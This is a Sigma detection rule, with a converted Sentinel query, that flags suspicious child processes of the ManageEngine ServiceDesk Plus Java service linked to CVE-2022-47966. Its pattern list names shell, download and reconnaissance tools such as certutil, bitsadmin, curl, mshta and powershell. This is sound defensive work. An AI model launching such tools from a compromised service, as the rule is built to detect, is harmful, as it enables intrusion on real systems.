Detects suspicious child processes of the “Manage Engine ServiceDesk Plus” Java web service
title: Suspicious Child Process Of Manage Engine ServiceDesk
id: cea2b7ea-792b-405f-95a1-b903ea06458f
status: test
description: Detects suspicious child processes of the "Manage Engine ServiceDesk Plus" Java web service
references:
- https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/
- https://github.com/horizon3ai/CVE-2022-47966/blob/3a51c6b72ebbd87392babd955a8fbeaee2090b35/CVE-2022-47966.py
- https://blog.viettelcybersecurity.com/saml-show-stopper/
author: Florian Roth (Nextron Systems)
date: 2023-01-18
modified: 2023-08-29
tags:
- attack.command-and-control
- attack.t1102
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|contains|all:
- '\ManageEngine\ServiceDesk\'
- '\java.exe'
Image|endswith:
- '\AppVLP.exe'
- '\bash.exe'
- '\bitsadmin.exe'
- '\calc.exe'
- '\certutil.exe'
- '\cscript.exe'
- '\curl.exe'
- '\forfiles.exe'
- '\mftrace.exe'
- '\mshta.exe'
- '\net.exe'
- '\net1.exe'
- '\notepad.exe' # Often used in POCs
- '\powershell.exe'
- '\pwsh.exe'
- '\query.exe'
- '\reg.exe'
- '\schtasks.exe'
- '\scrcons.exe'
- '\sh.exe'
- '\systeminfo.exe'
- '\whoami.exe' # Often used in POCs
- '\wmic.exe'
- '\wscript.exe'
# - '\hh.exe'
# - '\regsvr32.exe'
# - '\rundll32.exe'
# - '\scriptrunner.exe'
filter_main_net:
Image|endswith:
- '\net.exe'
- '\net1.exe'
CommandLine|contains: ' stop'
condition: selection and not 1 of filter_main_*
falsepositives:
- Legitimate sub processes started by Manage Engine ServiceDesk Pro
level: high
imProcessCreate
| where (((ParentProcessName contains "\\ManageEngine\\ServiceDesk\\" and ParentProcessName contains "\\java.exe") or (ActingProcessName contains "\\ManageEngine\\ServiceDesk\\" and ActingProcessName contains "\\java.exe")) and (TargetProcessName endswith "\\AppVLP.exe" or TargetProcessName endswith "\\bash.exe" or TargetProcessName endswith "\\bitsadmin.exe" or TargetProcessName endswith "\\calc.exe" or TargetProcessName endswith "\\certutil.exe" or TargetProcessName endswith "\\cscript.exe" or TargetProcessName endswith "\\curl.exe" or TargetProcessName endswith "\\forfiles.exe" or TargetProcessName endswith "\\mftrace.exe" or TargetProcessName endswith "\\mshta.exe" or TargetProcessName endswith "\\net.exe" or TargetProcessName endswith "\\net1.exe" or TargetProcessName endswith "\\notepad.exe" or TargetProcessName endswith "\\powershell.exe" or TargetProcessName endswith "\\pwsh.exe" or TargetProcessName endswith "\\query.exe" or TargetProcessName endswith "\\reg.exe" or TargetProcessName endswith "\\schtasks.exe" or TargetProcessName endswith "\\scrcons.exe" or TargetProcessName endswith "\\sh.exe" or TargetProcessName endswith "\\systeminfo.exe" or TargetProcessName endswith "\\whoami.exe" or TargetProcessName endswith "\\wmic.exe" or TargetProcessName endswith "\\wscript.exe")) and (not(((TargetProcessName endswith "\\net.exe" or TargetProcessName endswith "\\net1.exe") and TargetProcessCommandLine contains " stop")))| Sentinel Table | Notes |
|---|---|
imProcessCreate | Ensure this data connector is enabled |